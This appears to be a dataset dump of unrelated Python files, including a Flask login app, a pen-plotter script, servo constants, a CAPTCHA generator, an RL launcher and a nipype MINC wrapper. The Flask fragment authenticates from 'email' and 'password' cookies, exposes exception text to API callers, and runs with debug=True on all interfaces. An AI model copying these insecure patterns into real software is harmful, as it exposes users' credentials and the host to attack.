    """Serve the private page for an authenticated user; otherwise redirect
    to the login page.

    Fix: the original built an unused LoginForm() before redirecting; the
    dead local has been removed.
    """
    if auth_user(request.cookies):
        user_logged = {'username': request.cookies.get('email')}
        return render_template('private.html', title='Private Page', user=user_logged, secret=get_secret())
    return redirect(url_for('login'))
@app.route('/log_out', methods=['GET', 'POST'])
def log_out():
    """Expire both auth cookies and show the landing page."""
    response = make_response(render_template('index.html', title='Logged out'))
    for cookie_name in ('email', 'password'):
        response.set_cookie(cookie_name, '', expires=0)
    return response
@app.route('/api/thirdparties/renew_third_party_secret', methods=['GET'])
def renew_third_party_secret():
    """API endpoint: rotate a third party's secret after verifying credentials.

    Query params: 'username' and the current 'secret'.
    On success renders the private page; on failure returns a JSON object
    with a negative 'Response' code (-1 unknown third party, -2 renewal
    failed, -3 credential check failed).
    NOTE(review): success returns HTML while errors return JSON -- confirm
    API consumers expect this mix.
    """
    username = request.args.get('username')
    secret = request.args.get('secret')
    try:
        result = db_handler.check_third_party(username, secret)
        if result == 0:
            return jsonify({'Response': -1, 'Reason': 'Third-party not found'})
        else:
            try:
                db_handler.renew_third_party_secret(username)
            except Exception as e:
                print(str(e))
                return jsonify({'Response': -2, 'Reason': str(e)})
            user_logged = {'username': username}
            return render_template('private.html', title='Private Page', user=user_logged, secret=get_secret())
    except Exception as e:
        print(str(e))
        return jsonify({'Response': -3, 'Reason': str(e)})
def get_secret(user=''):
    """Return the stored secret for *user*, defaulting to the 'email' cookie
    of the current request when no user is given."""
    target = user if user != '' else request.cookies.get('email')
    return db_handler.get_third_party_secret(target)
if __name__ == '__main__':
    try:
        try:
            # Run the web app with the Let's Encrypt TLS certificate.
            # Fix: `context` was referenced but its assignment was commented
            # out, so this branch always raised NameError and silently fell
            # through to HTTP; the tuple is now defined. The bare `except:`
            # has also been narrowed to Exception so Ctrl-C reaches the
            # outer KeyboardInterrupt handler.
            context = (cert, key)
            app.run(host='0.0.0.0', port=443, ssl_context=context, threaded=True, debug=True)
        except Exception:
            # Fallback: plain HTTP for debugging on localhost (e.g. the
            # certificate files are absent or unreadable).
            app.run(host='0.0.0.0', port=80, threaded=True, debug=True)
    except KeyboardInterrupt:
        print("[*] Server shutted down")
        db_handler.db.close()
        sys.exit(0)
|
23,420 | 3ab5d62359f25223ae162a81d8df46925514983a |
import colorsys
import math
import random
import time
import traceback

from blinkt import set_pixel, set_brightness, show, clear
import numpy as np

import drawer
running = True
yMin = [1.0/3.0,18-(1.0/3.0)]
xMax = [.5,25.5]
def framer(N):
    """Experimentally partition an int(1.5*N) x N grid into random labelled slabs.

    NOTE(review): this looks unfinished -- `Ry` is computed but never used,
    `frame[x:x+Rx]` slices whole rows only (ignoring y), and the body only
    writes while the grid is still all-zero, so the `while (frame == 0).any()`
    loop cannot terminate unless the very first slab covers every row.
    Confirm intent before relying on this function.
    """
    Ny = N
    Nx = int(N*1.5)
    frame = np.zeros((Nx,Ny))
    count = 1
    while (frame == 0).any():
        x = np.random.randint(0,Nx)
        y = np.random.randint(0,Ny)
        Rx = np.random.randint(-x,Nx-x)
        Ry = np.random.randint(-y,Ny-y)  # unused -- see NOTE above
        if (frame==0).all():
            frame[x:x+Rx] = count
            count += 1
    print(frame)
    for k in range(1,count):
        print(np.where(frame == k))
    return frame
def switchColor(col):
    """Show a status colour on the first two Blinkt! pixels.

    0 -> green, 1 -> red, 2 -> blue; any other value just clears the strip.
    """
    clear()
    palette = {0: (0, 255, 0), 1: (255, 0, 0), 2: (0, 0, 255)}
    if col in palette:
        r, g, b = palette[col]
        for idx in range(2):
            set_pixel(idx, r, g, b)
    show()
def animColor():
    """Sweep a clock-seeded rainbow across the 8 Blinkt! pixels, hold two
    seconds, then clear the strip.

    Fix: this function uses the `time` module, which was never imported in
    this file (NameError at runtime); `import time` is now at the top of
    the file. The dead `hue = 0` pre-assignment was also removed.
    """
    spacing = 360.0 / 16.0
    clear()
    # Seed the hue from the clock so successive calls start on different colours.
    hue = int(time.time() * 100) % 360
    for x in range(8):
        offset = x * spacing
        h = ((hue + offset) % 360) / 360.0
        r, g, b = [int(c * 255) for c in colorsys.hsv_to_rgb(h, 1.0, 1.0)]
        set_pixel(x, r, g, b)
        time.sleep(.05)
    show()
    time.sleep(2)
    clear()
    show()
def main():
    """Drive the plotter: draw 8 random squares, then sine-wave lines clipped
    to one square, signalling progress via the Blinkt! LEDs."""
    set_brightness(.05)
    switchColor(1)
    draw = drawer.Drawer(output = True)
    switchColor(2)
    print('---Switch is strating')
    #intializeDrawer()
    flip = False
    xSquare = []
    # Pick 8 random squares [x0, y0, R0] that fit inside the 10..250 x 10..170
    # drawing area (rejection sampling).
    for k in range(0,8):
        checked = False
        while not checked:
            x0 = 30 + 200*random.random()
            y0 = 30 + 150*random.random()
            R0 = 5+15*random.random()
            if x0-R0>10 and x0+R0<250 and y0-R0>10 and y0+R0<170:
                checked = True
        xSquare.append([x0,y0,R0])
    print('and the sqaures are : ')
    print(xSquare)
    try:
        for xS in xSquare:
            draw.square(xS[0],xS[1],xS[2])
        # NOTE(review): `xS` below is the leftover loop variable from the
        # squares loop above, so only the LAST square masks the wave lines --
        # confirm this is intended rather than clipping against every square.
        for k in range(10,300):
            x = np.arange(10,250,.2)
            if flip:
                # Alternate drawing direction each row so the pen zig-zags.
                x = np.flip(x)
            y = 10+k*.6+2*np.sin((6*math.pi*((x-10)/240))**(1+k/300))
            y2 = np.copy(y[(x>=xS[0]-xS[2]) & (x<=xS[0]+xS[2]) & (y>=xS[1]-xS[2]) & (y<=xS[1]+xS[2]) ])
            x2 = np.copy(x[(x>=xS[0]-xS[2]) & (x<=xS[0]+xS[2]) & (y>=xS[1]-xS[2]) & (y<=xS[1]+xS[2]) ])
            if len(x2)>2:
                draw.lines(x2,y2)
            flip = not flip
        #line(50,50,length=50,angle=0)
        #line(50,50,length=55,angle=.1)
        #line(50,50,length=60,angle=.2)
        #line(50,50,length=65,angle=.4)
        #line(50,50,length=70,angle=.8)
        #line(50,50,length=75,angle=1.6)
        #for k in range(0,10):
        #draw.square(100,70,10*k/2.0,noise = 3,speed=500)
        #for j in range(0,10):
        #square((k+1)*11,(j+1)*11,10,angle=math.pi*(k*j)/(400))
        #draw.circle((k+1)*11,(j+1)*11,k+j)
    except Exception as e:
        print(traceback.format_exc())
    # Park the pen and release the hardware regardless of drawing errors.
    draw.toPosition(0,0)
    draw.closeDrawer()
    switchColor(1)
if __name__ == "__main__":
main() |
23,421 | 33a5bce7b2d97a6051464fe9aa858f48a64eb712 | ##############################################
# The MIT License (MIT)
# Copyright (c) 2016 Kevin Walchko
# see LICENSE for full details
##############################################
"""
This information is specific to Dynamixel's XL-320 servo motor.
http://support.robotis.com/en/product/dynamixel/xl-series/xl-320.htm
"""
# --------- INSTRUCTIONS -----
XL320_PING = 0x01
XL320_READ = 0x02
XL320_WRITE = 0x03
XL320_REG_WRITE = 0x04
XL320_ACTION = 0x05
XL320_RESET = 0x06
XL320_REBOOT = 0x08
XL320_STATUS = 0x55
XL320_SYNC_READ = 0x82
XL320_SYNC_WRITE = 0x83
XL320_BULK_READ = 0x92
XL320_BULK_WRITE = 0x93
# -------- EEPROM -------------
XL320_MODEL_NUMBER = 0
XL320_VER_FIRMWARE = 2
XL320_ID = 3
XL320_BAUD_RATE = 4
XL320_DELAY_TIME = 5
XL320_CW_ANGLE_LIMIT = 6 # min angle, default 0
XL320_CCW_ANGLE_LIMIT = 8 # max angle, default 300
XL320_CONTROL_MODE = 11 # joint or wheel mode, default joint (servo)
XL320_MAX_TORQUE = 15
XL320_RETURN_LEVEL = 17
# -------- RAM ----------------
XL320_TORQUE_ENABLE = 24 # servo mode on/off - turn into wheel
XL320_LED = 25
XL320_GOAL_POSITION = 30
XL320_GOAL_VELOCITY = 32
XL320_GOAL_TORQUE = 35
XL320_PRESENT_POSITION = 37 # current servo angle
XL320_PRESENT_SPEED = 39 # current speed
XL320_PESENT_LOAD = 41 # current load
XL320_PESENT_VOLTAGE = 45 # current voltage
XL320_PESENT_TEMP = 46 # current temperature
XL320_MOVING = 49
XL320_HW_ERROR_STATUS = 50
XL320_PUNCH = 51
# --------- OTHER -------------
XL320_RESET_ALL = 0xFF
XL320_RESET_ALL_BUT_ID = 0x01
XL320_RESET_ALL_BUT_ID_BAUD_RATE = 0x02
XL320_LED_WHITE = 7
XL320_LED_BLUE_GREEN = 6
XL320_LED_PINK = 5
XL320_LED_BLUE = 4
XL320_LED_YELLOW = 3
XL320_LED_GREEN = 2
XL320_LED_RED = 1
XL320_LED_OFF = 0
XL320_BROADCAST_ADDR = 0xfe # a packet with this ID will go to all servos
XL320_WHEEL_MODE = 1
XL320_JOINT_MODE = 2 # normal servo
XL320_9600 = 0 # 0: 9600, 1:57600, 2:115200, 3:1Mbps
XL320_57600 = 1
XL320_115200 = 2
XL320_1000000 = 3
# Conversions from values to strings for debugging
Baudrates = {
0: '9.6 kbps',
1: '57.6 kbps',
2: '115 kbps',
3: '1 Mbps'
}
Modes = {
1: 'Wheel',
2: 'Joint'
}
ReturnTypes = {
0: 'No Return',
1: 'Only Read',
2: 'Return All'
}
LEDColors = {
0: 'Off',
1: 'Red',
2: 'Green',
3: 'Yellow',
4: 'Blue',
5: 'Pink',
6: 'Blue-Green',
7: 'White'
}
Moving = {
0: 'Completed',
1: 'Moving'
}
ErrorMsg = {
0: None,
1: 'ERROR_OVERLOAD',
2: 'ERROR_OVER_HEATING',
4: 'ERROR_INPUT_VOLTAGE'
}
# I don't trust these error number, I bet the documentation is wrong
ErrorStatusMsg = {
-1: 'Not a status packet',
0: None,
1: 'ERROR_RAIL_FAIL',
2: 'ERROR_INTRUCTION',
3: 'ERROR_CRC',
4: 'ERROR_DATA_RANGE',
5: 'ERROR_DATA_LENGTH',
6: 'ERROR_DATA_LIMIT',
7: 'ERROR_ACCEESS',
128: 'ALERT'
}
InstrToStr = {
1: 'Ping',
2: 'Read',
3: 'Write',
6: 'Reset',
8: 'Reboot',
85: 'Status'
}
|
23,422 | 8c67bbd2977f9af70b189d77943e0407429a725a | import numpy as np
from PIL import Image,ImageDraw,ImageFont
font = ImageFont.truetype('1.ttf',size=36)
font1 = ImageFont.truetype('2.ttf',size=36)
font2 = ImageFont.truetype('3.ttf',size=36)
font3 = ImageFont.truetype('4.ttf',size=36)
def num():
    """Return one random decimal digit character, '0' through '9'.

    Fix: numpy's randint upper bound is exclusive, so the original
    randint(48, 57) could never yield chr(57) == '9'.
    """
    return chr(np.random.randint(48, 58))
def forward_color():
    """Random glyph (foreground) colour: an RGB triple with each channel in [120, 200)."""
    return tuple(np.random.randint(120, 200) for _ in range(3))
def back_color():
    """Random background-noise colour: an RGB triple with each channel in [50, 150)."""
    return tuple(np.random.randint(50, 150) for _ in range(3))
# CAPTCHA canvas size in pixels.
w = 120
h =60
path = r'code1'  # output directory -- must already exist before running
# Generate 200 four-digit CAPTCHA images, each named after its digit string.
for i in range(200):
    image =Image.new('RGB',(w,h),color=(255,255,255))
    img = ImageDraw.Draw(image)
    # Fill every pixel with a random colour to create background noise.
    for j in range(w):
        for k in range(h):
            img.point((j,k),fill=back_color())
    list_num = []
    # Draw four random digits, 30px apart.
    # NOTE(review): only font1 is ever used -- font/font2/font3 loaded above
    # are never drawn with. Also, a repeated digit string overwrites the
    # earlier image of the same name, so fewer than 200 files may result.
    for m in range(4):
        ch =num()
        list_num.append(ch)
        img.text((30*m+10,18),text=ch,fill=forward_color(),font=font1)
    image.save('{0}/{1}.jpg'.format(path,''.join(list_num)))
|
23,423 | 02e93d0a21aed5564cf03048426b9b422ad40ecc | __version__ = '11'
|
23,424 | 84f81b83184e7d268dbe66f94571eeec0229ccd3 | import functools
def prefSum(a):
    """Return the list of running (prefix) sums of *a*."""
    sums = []
    total = 0
    for value in a:
        total += value
        sums.append(total)
    return sums
print(prefSum(a=[1, 2, 3]))
|
23,425 | 0c5514bfde6486ed96fbf5ebbd9db77e0ae2b9db | class Solution(object):
def isPowerOfTwo(self, n):
while n/2.0>=1:
n=n/2.0
return n==1
#/后写浮点数,才做浮点数除法 |
23,426 | 79c0c84cf04adbc3ee192e9a944459d6a42dc353 | from SAC.algo import SAC
from SAC.model import MLPContiModel, MLPEvaluateModel
from TOOLS.Logger import LoggerPrinter
from ENVS.Envs import MountainCarContiEnv, PendulumEnv
import numpy as np
def main(game_index: int, mode: str) -> None:
    """Run the SAC algorithm on one of the benchmark control environments.

    :param game_index: which environment to use:
        1. Pendulum (continuous control)
        2. MountainCar (continuous control)
    :param mode: 'TRAIN' to train and then evaluate, 'TEST' to only evaluate.
    :raises ValueError: if game_index or mode is not a supported value
        (the original silently fell through, causing a NameError on
        undefined locals for an unknown game_index).
    :return: None
    """
    logger = LoggerPrinter()
    if game_index == 1:
        exp_name = 'Pendulum'
        env = PendulumEnv(logger=logger)
        act_high = np.array([2., ])
        policy_model = MLPContiModel(env.obs_dim, env.act_dim, (30, 15), 'Sigmoid', logger)
        evaluate_model = MLPEvaluateModel(env.obs_dim, env.act_dim, (30, 15), 'Sigmoid', logger)
        gamma = 0.95
        eva_lr = 0.005
        pol_lr = 0.005
        rho = 0.005
        learn_epochs = 25
        max_iter_per_epoch = 1500
        alpha = 0.3
        is_OU_noise = False
    elif game_index == 2:
        exp_name = 'MountainCarConti'
        env = MountainCarContiEnv(logger=logger)
        act_high = np.array([1., ])
        policy_model = MLPContiModel(env.obs_dim, env.act_dim, (40, 25), 'Sigmoid', logger)
        evaluate_model = MLPEvaluateModel(env.obs_dim, env.act_dim, (30, 15), 'Sigmoid', logger)
        gamma = 0.99
        eva_lr = 0.005
        pol_lr = 0.005
        rho = 0.005
        learn_epochs = 100
        max_iter_per_epoch = 1500
        alpha = 0.3
        is_OU_noise = True
    else:
        raise ValueError('game_index must be 1 (Pendulum) or 2 (MountainCarConti)')
    sac = SAC(env, policy_model, evaluate_model, logger, 'MODEL_PARAMS', exp_name, gamma=gamma,
              eva_lr=eva_lr, pol_lr=pol_lr, rho=rho, conti_control_max=act_high, alpha=alpha,
              is_OU_noise=is_OU_noise)
    if mode == 'TRAIN':
        sac.train(learn_epochs=learn_epochs, max_iter_per_epoch=max_iter_per_epoch, retrain_label=False,
                  buffer_size=100000, start_control_step=3000, update_freq=100, sample_size=100, save_freq=1000)
        sac.test(test_epochs=10, max_iter_per_epoch=1200)
    elif mode == 'TEST':
        sac.test(test_epochs=10, max_iter_per_epoch=1500)
    else:
        raise ValueError("mode must be 'TRAIN' or 'TEST'")
if __name__ == '__main__':
main(2, 'TRAIN')
|
23,427 | 547c052b9c73df6c55567e9288b730432e5af9d4 | """
Advent of Code 2018
Day 17: Reservoir Research
"""
from collections import namedtuple
from math import inf
Vein = namedtuple('Vein', ['minx', 'maxx', 'miny', 'maxy'])
Posn = namedtuple('Posn', ['x', 'y'])
EMPTY_SPACE = ' '
def print_grid(grid):
    "Print the grid row by row, followed by a blank line."
    for row in grid:
        print("".join(row))
    print()
def parse_scan(input_line):
    """Parse a scan line like 'x=495, y=2..7' into a Vein.

    A token with a single coordinate (no '..') yields an equal min/max.
    """
    bounds = {}
    for token in input_line.strip().split(', '):
        axis = token[0]
        parts = token[2:].split('..')
        bounds[axis] = (int(parts[0]), int(parts[-1]))
    minx, maxx = bounds['x']
    miny, maxy = bounds['y']
    return Vein(minx, maxx, miny, maxy)
def new_map(veins):
    """Build the simulation grid from the clay veins.

    Returns (grid, spring position, miny, maxy). Columns cover the veins'
    x-extent plus a one-cell margin on each side; rows run from y=0 down
    to the deepest vein. '#' marks clay, '+' the spring at world x == 500.
    """
    minx = inf
    maxx = -inf
    miny = inf
    maxy = -inf
    for vn in veins:
        minx = min(vn.minx, minx)
        maxx = max(vn.maxx, maxx)
        miny = min(vn.miny, miny)
        maxy = max(vn.maxy, maxy)
    wd = maxx - minx + 3  # inclusive x span plus one margin column each side
    xoff = minx - 1  # world x -> column index: col = x - xoff
    ht = maxy + 1
    grid = [[EMPTY_SPACE for _ in range(wd)] for _ in range(ht)]
    for vn in veins:
        for y in range(vn.miny, vn.maxy + 1):
            for x in range(vn.minx, vn.maxx + 1):
                grid[y][x - xoff] = '#'
    spring_x, spring_y = 500 - xoff, 0
    grid[spring_y][spring_x] = '+'
    return grid, Posn(spring_x, spring_y), miny, maxy
def move_up(grid, posn):
    "Position one row up, or None at the top margin (y <= 1)."
    if posn.y <= 1:
        return None
    return Posn(posn.x, posn.y - 1)
def move_down(grid, posn):
    "Position one row down, or None past the last row."
    if posn.y + 1 >= len(grid):
        return None
    return Posn(posn.x, posn.y + 1)
def move_left(grid, posn):
    "Position one column left, or None past the left edge."
    if posn.x < 1:
        return None
    return Posn(posn.x - 1, posn.y)
def move_right(grid, posn):
    "Position one column right, or None past the right edge."
    if posn.x + 1 >= len(grid[0]):
        return None
    return Posn(posn.x + 1, posn.y)
def grid_get(grid, posn):
    "Return the cell at posn."
    return grid[posn.y][posn.x]
def grid_set(grid, posn, cell):
    "Overwrite the cell at posn in place."
    grid[posn.y][posn.x] = cell
def fill_between(grid, left, right, cell="~"):
    "Fill the cells strictly between left and right (same row) with cell."
    row = left.y
    for col in range(left.x + 1, right.x):
        grid[row][col] = cell
def find_left(grid, posn):
    """Scan left along the top of a supported row.

    Returns the first position whose cell below is passable ('|' or empty)
    -- i.e. where water would spill over -- or the '#' wall cell that
    stops the scan.

    Fix: the original ended with `if posn is None: return posn` followed by
    `return posn`; both branches are identical (and the while-loop cannot
    exit with posn == None since grid_get would raise first), so the dead
    guard is collapsed to a single return.
    """
    under = move_down(grid, posn)
    if grid_get(grid, under) in ('|', EMPTY_SPACE):
        return posn
    posn = move_left(grid, posn)
    while grid_get(grid, posn) != '#':
        under = move_down(grid, posn)
        if grid_get(grid, under) in ('|', EMPTY_SPACE):
            return posn
        posn = move_left(grid, posn)
    return posn
def find_right(grid, posn):
    """Scan right along the top of a supported row to a spill point or wall.

    Returns a position whose cell below is passable ('|' or empty), or the
    '#' wall cell that stops the scan.
    NOTE(review): unlike find_left, when the cell below the start is
    passable this steps right once instead of returning posn -- confirm
    the asymmetry is intended by the caller (drip).
    """
    under = move_down(grid, posn)
    if grid_get(grid, under) == '|' or grid_get(grid, under) == EMPTY_SPACE:
        posn = move_right(grid, posn)
    while grid_get(grid, posn) != '#':
        under = move_down(grid, posn)
        if grid_get(grid, under) == '|' or grid_get(grid, under) == EMPTY_SPACE:
            break
        posn = move_right(grid, posn)
    # Dead guard: posn cannot be None here (grid_get would have raised first),
    # so both branches below return the same value.
    if posn is None:
        return posn
    return posn
def drip(grid, spring):
    """Simulate water flowing from the spring: '|' flowing, '~' settled.

    Worklist algorithm: water falls straight down, marking '|', until
    blocked by clay '#' or settled water '~'; it then scans left/right.
    A row walled by '#' on both sides settles to '~' and the parent cell
    is re-queued; otherwise the row stays '|' and any spill points are
    queued to continue falling.
    """
    parent = {}  # fallen-to position -> the position the water came from
    queue = [spring]
    while queue:
        posn = queue.pop()
        down = move_down(grid, posn)
        if down is None:
            # Ran off the bottom of the grid; this stream is finished.
            continue
        if down and grid_get(grid, down) != "#" and grid_get(grid, down) != "~":
            grid_set(grid, down, '|')
            parent[down] = posn
            queue.append(down)
        else:
            right = find_right(grid, posn)
            left = find_left(grid, posn)
            if left is None or right is None:
                break
            if grid_get(grid, left) == '#' and grid_get(grid, right) == '#':
                # Walled on both sides: this row settles; revisit the parent
                # so the water level can rise.
                fill_between(grid, left, right, "~")
                queue.append(parent[posn])
            else:
                # Open on at least one side: row is flowing water; queue any
                # newly-marked spill cells to keep falling from there.
                fill_between(grid, left, right, "|")
                if grid_get(grid, left) == EMPTY_SPACE:
                    grid_set(grid, left, '|')
                    parent[left] = posn
                    queue.append(left)
                if grid_get(grid, right) == EMPTY_SPACE:
                    grid_set(grid, right, '|')
                    parent[right] = posn
                    queue.append(right)
def solve_a(grid, miny):
    "Solve part one: count water tiles ('~' and '|') from row miny down."
    return sum(
        cell in ('~', '|')
        for row in grid[miny:]
        for cell in row
    )
def solve_b(grid, miny):
    "Solve part two: count settled water tiles ('~') from row miny down."
    return sum(row.count('~') for row in grid[miny:])
def main():
    "Read vein scans from stdin, run the water simulation, print both answers."
    import sys
    veins = [parse_scan(ln) for ln in sys.stdin]
    grid, spring, miny, maxy = new_map(veins)
    drip(grid, spring)
    # print_grid(grid)
    print(solve_a(grid, miny))
    print(solve_b(grid, miny))
|
23,428 | 9b744cd071df43dffff3b729650b8e7c7db3ae0a |
#def gcd(a, b):
# while b:
# a, b = b, a % b
#return a
#def lcm(a, b):
# w = a //gcd(a,b)
#return w * b
#def insertionSortWithIndex(arr, m):
# for i in range(1, len(arr)):
# key = arr[i]
# l = m[i]
# j = i-1
# while j >=0 and key < arr[j] :
# arr[j+1] = arr[j]
# m[j+1] = m[j]
# j -= 1
# m[j+1] = l
# arr[j+1] = key
#insertionSortWithIndex(arr, indexstore)
#def binary_search(array) -> int:
# def condition(value) -> bool:
# pass
# left, right = min(search_space), max(
# search_space) # could be [0, n], [1, n] etc. Depends on problem
# while left < right:
# mid = left + (right - left) // 2
# if condition(mid):
# right = mid
# else:
# left = mid + 1
# return left
#index = sorted(range(len(nums)), key = lambda x: nums[x])
def solver(N, X, W):
    """Return W times the number of size-X groups needed to cover N items
    (i.e. W * ceil(N / X) for positive X)."""
    full_groups, remainder = divmod(N, X)
    if remainder > 0:
        full_groups += 1
    return W * full_groups
if __name__=='__main__':
N, X, T= map(int, input().split())
#arr = list(map(int,input().split()))
print(solver(N,X,T)) |
23,429 | 3c68dec9860986cb1c7de1f97eaef5bac7a0a50d | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""The minc module provides classes for interfacing with the `MINC
<http://www.bic.mni.mcgill.ca/ServicesSoftware/MINC>`_ command line tools. This
module was written to work with MINC version 2.2.00.
Author: `Carlo Hamalainen <http://carlo-hamalainen.net>`__
"""
import glob
import os
import os.path
import re
import warnings
from ..base import (
TraitedSpec,
CommandLineInputSpec,
CommandLine,
StdOutCommandLineInputSpec,
StdOutCommandLine,
File,
Directory,
InputMultiPath,
OutputMultiPath,
traits,
isdefined,
)
from .base import aggregate_filename
warnings.filterwarnings("always", category=UserWarning)
class ExtractInputSpec(StdOutCommandLineInputSpec):
    """Input specification for mincextract (see Extract)."""

    input_file = File(
        desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
    )
    output_file = File(
        desc="output file",
        position=-1,
        name_source=["input_file"],
        hash_files=False,
        name_template="%s.raw",
        keep_extension=False,
    )
    # Mutually-exclusive output data types.
    # Fix: "write_ascii" was listed twice in this xor group.
    _xor_write = (
        "write_ascii",
        "write_byte",
        "write_short",
        "write_int",
        "write_long",
        "write_float",
        "write_double",
        "write_signed",
        "write_unsigned",
    )
    write_ascii = traits.Bool(
        desc="Write out data as ascii strings (default).",
        argstr="-ascii",
        xor=_xor_write,
    )
    write_byte = traits.Bool(
        desc="Write out data as bytes.", argstr="-byte", xor=_xor_write
    )
    write_short = traits.Bool(
        desc="Write out data as short integers.", argstr="-short", xor=_xor_write
    )
    write_int = traits.Bool(
        desc="Write out data as 32-bit integers.", argstr="-int", xor=_xor_write
    )
    write_long = traits.Bool(
        desc="Superseded by write_int.", argstr="-long", xor=_xor_write
    )
    write_float = traits.Bool(
        desc="Write out data as single precision floating-point values.",
        argstr="-float",
        xor=_xor_write,
    )
    write_double = traits.Bool(
        desc="Write out data as double precision floating-point values.",
        argstr="-double",
        xor=_xor_write,
    )
    _xor_signed = ("write_signed", "write_unsigned")
    write_signed = traits.Bool(
        desc="Write out signed data.", argstr="-signed", xor=_xor_signed
    )
    write_unsigned = traits.Bool(
        desc="Write out unsigned data.", argstr="-unsigned", xor=_xor_signed
    )
    write_range = traits.Tuple(
        traits.Float,
        traits.Float,
        argstr="-range %s %s",
        desc="Specify the range of output values\nDefault value: 1.79769e+308 1.79769e+308.",
    )
    _xor_normalize = ("normalize", "nonormalize")
    normalize = traits.Bool(
        desc="Normalize integer pixel values to file max and min.",
        argstr="-normalize",
        xor=_xor_normalize,
    )
    nonormalize = traits.Bool(
        desc="Turn off pixel normalization.", argstr="-nonormalize", xor=_xor_normalize
    )
    image_range = traits.Tuple(
        traits.Float,
        traits.Float,
        desc="Specify the range of real image values for normalization.",
        argstr="-image_range %s %s",
    )
    image_minimum = traits.Float(
        desc=(
            "Specify the minimum real image value for normalization."
            "Default value: 1.79769e+308."
        ),
        argstr="-image_minimum %s",
    )
    image_maximum = traits.Float(
        desc=(
            "Specify the maximum real image value for normalization."
            "Default value: 1.79769e+308."
        ),
        argstr="-image_maximum %s",
    )
    start = InputMultiPath(
        traits.Int,
        desc="Specifies corner of hyperslab (C conventions for indices).",
        sep=",",
        argstr="-start %s",
    )
    count = InputMultiPath(
        traits.Int,
        desc="Specifies edge lengths of hyperslab to read.",
        sep=",",
        argstr="-count %s",
    )
    # FIXME Can we make sure that len(start) == len(count)?
    _xor_flip = (
        "flip_positive_direction",
        "flip_negative_direction",
        "flip_any_direction",
    )
    flip_positive_direction = traits.Bool(
        desc="Flip images to always have positive direction.",
        argstr="-positive_direction",
        xor=_xor_flip,
    )
    flip_negative_direction = traits.Bool(
        desc="Flip images to always have negative direction.",
        argstr="-negative_direction",
        xor=_xor_flip,
    )
    flip_any_direction = traits.Bool(
        desc="Do not flip images (Default).", argstr="-any_direction", xor=_xor_flip
    )
    _xor_x_flip = ("flip_x_positive", "flip_x_negative", "flip_x_any")
    flip_x_positive = traits.Bool(
        desc="Flip images to give positive xspace:step value (left-to-right).",
        argstr="+xdirection",
        xor=_xor_x_flip,
    )
    flip_x_negative = traits.Bool(
        desc="Flip images to give negative xspace:step value (right-to-left).",
        argstr="-xdirection",
        xor=_xor_x_flip,
    )
    flip_x_any = traits.Bool(
        desc="Don't flip images along x-axis (default).",
        argstr="-xanydirection",
        xor=_xor_x_flip,
    )
    _xor_y_flip = ("flip_y_positive", "flip_y_negative", "flip_y_any")
    flip_y_positive = traits.Bool(
        desc="Flip images to give positive yspace:step value (post-to-ant).",
        argstr="+ydirection",
        xor=_xor_y_flip,
    )
    flip_y_negative = traits.Bool(
        desc="Flip images to give negative yspace:step value (ant-to-post).",
        argstr="-ydirection",
        xor=_xor_y_flip,
    )
    flip_y_any = traits.Bool(
        desc="Don't flip images along y-axis (default).",
        argstr="-yanydirection",
        xor=_xor_y_flip,
    )
    _xor_z_flip = ("flip_z_positive", "flip_z_negative", "flip_z_any")
    flip_z_positive = traits.Bool(
        desc="Flip images to give positive zspace:step value (inf-to-sup).",
        argstr="+zdirection",
        xor=_xor_z_flip,
    )
    flip_z_negative = traits.Bool(
        desc="Flip images to give negative zspace:step value (sup-to-inf).",
        argstr="-zdirection",
        xor=_xor_z_flip,
    )
    flip_z_any = traits.Bool(
        desc="Don't flip images along z-axis (default).",
        argstr="-zanydirection",
        xor=_xor_z_flip,
    )
class ExtractOutputSpec(TraitedSpec):
output_file = File(desc="output file in raw/text format", exists=True)
class Extract(StdOutCommandLine):
"""Dump a hyperslab of MINC file data.
Examples
--------
>>> from nipype.interfaces.minc import Extract
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> extract = Extract(input_file=minc2Dfile)
>>> extract.run() # doctest: +SKIP
>>> extract = Extract(input_file=minc2Dfile, start=[3, 10, 5], count=[4, 4, 4]) # extract a 4x4x4 slab at offset [3, 10, 5]
>>> extract.run() # doctest: +SKIP
"""
input_spec = ExtractInputSpec
output_spec = ExtractOutputSpec
_cmd = "mincextract"
class ToRawInputSpec(StdOutCommandLineInputSpec):
input_file = File(
desc="input file", exists=True, mandatory=True, argstr="%s", position=-2
)
output_file = File(
desc="output file",
position=-1,
name_source=["input_file"],
hash_files=False,
name_template="%s.raw",
keep_extension=False,
)
_xor_write = (
"write_byte",
"write_short",
"write_int",
"write_long",
"write_float",
"write_double",
)
write_byte = traits.Bool(
desc="Write out data as bytes.", argstr="-byte", xor=_xor_write
)
write_short = traits.Bool(
desc="Write out data as short integers.", argstr="-short", xor=_xor_write
)
write_int = traits.Bool(
desc="Write out data as 32-bit integers.", argstr="-int", xor=_xor_write
)
write_long = traits.Bool(
desc="Superseded by write_int.", argstr="-long", xor=_xor_write
)
write_float = traits.Bool(
desc="Write out data as single precision floating-point values.",
argstr="-float",
xor=_xor_write,
)
write_double = traits.Bool(
desc="Write out data as double precision floating-point values.",
argstr="-double",
xor=_xor_write,
)
_xor_signed = ("write_signed", "write_unsigned")
write_signed = traits.Bool(
desc="Write out signed data.", argstr="-signed", xor=_xor_signed
)
write_unsigned = traits.Bool(
desc="Write out unsigned data.", argstr="-unsigned", xor=_xor_signed
)
write_range = traits.Tuple(
traits.Float,
traits.Float,
argstr="-range %s %s",
desc=(
"Specify the range of output values."
"Default value: 1.79769e+308 1.79769e+308."
),
)
_xor_normalize = ("normalize", "nonormalize")
normalize = traits.Bool(
desc="Normalize integer pixel values to file max and min.",
argstr="-normalize",
xor=_xor_normalize,
)
nonormalize = traits.Bool(
desc="Turn off pixel normalization.", argstr="-nonormalize", xor=_xor_normalize
)
class ToRawOutputSpec(TraitedSpec):
output_file = File(desc="output file in raw format", exists=True)
class ToRaw(StdOutCommandLine):
"""Dump a chunk of MINC file data. This program is largely
superseded by mincextract (see Extract).
Examples
--------
>>> from nipype.interfaces.minc import ToRaw
>>> from nipype.interfaces.minc.testdata import minc2Dfile
>>> toraw = ToRaw(input_file=minc2Dfile)
>>> toraw.run() # doctest: +SKIP
>>> toraw = ToRaw(input_file=minc2Dfile, write_range=(0, 100))
>>> toraw.run() # doctest: +SKIP
"""
input_spec = ToRawInputSpec
output_spec = ToRawOutputSpec
_cmd = "minctoraw"
class ConvertInputSpec(CommandLineInputSpec):
input_file = File(
